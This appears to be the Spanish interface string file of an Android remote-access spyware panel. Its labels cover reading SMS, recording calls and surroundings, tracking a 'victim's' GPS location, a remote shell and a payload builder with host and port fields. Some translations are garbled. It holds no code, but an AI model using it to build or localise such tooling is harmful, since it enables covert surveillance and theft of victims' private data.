-------------- ES ---------------
puerto
Puerto:> 1023
Abrir el puerto
salida
El campo sólo acepta sólo números
No se puede utilizar el puerto de menos de 1.023 a menos que seas una raíz!
registro de llamadas
Las aplicaciones instaladas
Información del dispositivo
Teclado remoto
Panel de diversión
Sistema de Posicionamiento Global (GPS)
Escuchar a los alrededores de teléfono
Leer mensajes SMS
Los comandos remotos
gestor de archivos
Libreta de direcciones
Lista wifi
portapapeles
Process Manager
Enviar SMS
Administrador de descargas
Controla las notificaciones
pantalla de fondo
Detectar las caras (Samsung)
grabación de llamadas
Screen Recorder
IMEI
IP
FAO
V-ANDROID
MODELO
PAÍS
N.VERSION
FABRICANTE
DE SERIE
USUARIO
descargar
Subir
Registros de las víctimas
Shell de comandos
rendimiento
Cliente reinicio
Extracción Desconectado
todos
en línea
caja
servidor
copia
reinicio del servidor
La desinstalación
instrumentos
ayudar
descargas Box
construir
ajustes
Nota sobre Spy
tuberculosis
GB
MB
KB
B
Ln
Agregar archivo
Introduzca el nombre del archivo
nueva carpeta
añadir
nombre
Nombre del paquete
abierto
jugar a Google
desinstalación
nombre
número de teléfono
Añadir nombre
eliminar Nombre
refrescar
resolución de la pantalla:
refrescar
Mostrar en Contacto
número de teléfono
tipo de llamada
\ Nombre de su tiempo
tiempo
copia
enviar
Captura de pantalla
detener
enlace
Camino y nueva carpeta
título
descripción
nombre de la carpeta
Nombre de archivo
error
envié
IMEI
nombre del archivo
tamaño
ruta de archivos
abierto mediante el uso de
borrar
eliminar todo
abrir el archivo
navegador
No se pudo encontrar el archivo
No se pudo detectar las caras
se detectan las caras
nombre
tamaño
expediente
descargar
abierto por
rebautizar
borrar
refrescar
nuevo archivo
lectura
carpeta
otro
Este no es un directorio:
No se puede cargar esta carpeta
Un archivo con ese nombre ya existe, ¿desea reemplazar?
lectura>
text.txt
nueva carpeta
Las coordenadas del sitio de la víctima:
Localización:
REC
detener
jugar
Guardar
sin archivo
grabación
Detener la grabación por favor espere ...
Juega ...
terminar con éxito
Indefinido
detenido
En pausa
jugando
Scan Forward '
ScanReverse
buffering
espera
MediaEnded
transición
listo
La reconexión
pasado
Desconocido Estado:
Por favor espere ...
enviar
clásico
negro
ventana de alerta
URL
En silencio
Tonos
modos
notificación
El sistema de
Cargar configuración ...
refrescar
Agitar
temporizador:
mensaje
Abrir URL
teléfono de la barra
Sonidos y las comunicaciones
trémolo
Desactivar botón de salida
añadir un contacto
Introduzca el nombre
Introduzca el número de
añadir
Obtenga una notificación
Eliminación
enganchar
Sobre el sistema de
<batería
nombre
packageName
paquete de sistema
tamaño
matar
refrescar
Guardar
rebautizar
rebautizar
renamee
Las llamadas grabadas
tamaño
Iniciar la función de grabación
Pare función de grabación
El texto del mensaje
número telefónico
enviar
por favor espere ...
copia
cortada
pasta
SelectAll
deshacer
bueno
navegador
Aviso de servidor de nivel básico
notificación de audio cuando llegue nuevo cliente
añadir
idioma
Guardar
Panel de control
Ln
Ln
Ln
Nombre:
?
No se pudo encontrar el archivo
Ln
Ln
copiar:
Ln
Sin la activación de la propiedad
Ln
Descargas Box>
?
Nombre:
Ln
¿Quieres abrir este enlace
Ln
copia
cortada
pasta
SelectAll
deshacer
limpio
ApplicationName:
anfitrión:
puerto:
ServerName:
nombre de la versión:
icono
construir
construir>
Creación del servidor
El campo sólo acepta números
vista
detalles
lista
blook
Lista negro
Enviar lista negra
Black_list
Guardar
encontrar
La copia de archivo
Ver todos
cerca
maximizada
minimizado
restaurar
DESCARGAS
DCIM
TONOS
PELÍCULAS
FOTOS
MUSIC
NOTIFICACIONES
PODCASTS
RETIRADO
DOCUMENTOS
refrescar
descargar
borrar
Guardar
copia
copia
cortada
pasta
SelectAll
deshacer